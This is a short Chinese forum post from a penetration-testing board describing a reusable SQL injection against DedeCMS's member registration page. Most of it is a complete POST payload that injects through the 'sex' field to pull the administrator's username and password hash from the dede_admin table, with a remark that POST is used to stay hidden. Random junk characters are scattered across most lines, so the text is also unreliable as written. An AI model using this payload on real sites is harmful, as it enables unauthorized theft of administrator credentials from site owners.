中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞8 `& v0 o# Q& k# \+ ~3 x+ O5 c- L1 S
简要描述:0 s5 y' D  V, R& Q. z

) Z% b; }* Z' K* G. K/ R' n# W1 O需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
; Z9 \/ d' W: ^, @原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
& m( U% G& [: a3 O& U" @2 l. X& v3 |详细说明:跟这个漏洞
6 {, x# B5 q; \3 d
. S2 @0 c) b& u* l5 mWooYun: Dedecms SQL注射导致审核机制绕过漏洞
( Y  e% B) y$ k" d5 f是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
( N) |' m0 X2 W9 X  mPOST提交以下数据,其实不用POST提交的,这样隐蔽点." M. f9 ^! o1 k" U

% W) _4 J+ |& y! S0 a, }; F' m4 Bwww.political-security.com/member/reg_new.php' a' r; B/ j( j6 J; }! I9 f1 }1 T  ^
! g. c( g% y+ o* L; Q9 H4 F
POST8 c# J8 H* M1 t) A7 G8 E* |# ~
  X$ ^$ U& `6 R- W3 u
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
% s' v4 H( R% Yuserid=c4rp3nt3r&uname=c4rp3nt3r0 I) W! O% F- }) D
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss" ^8 b# A- J" ?' x  g" Q5 w7 G# q
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,& l7 b1 `' k- |0 I2 l6 f9 R0 i
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
- g* L& A  g. x( k%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2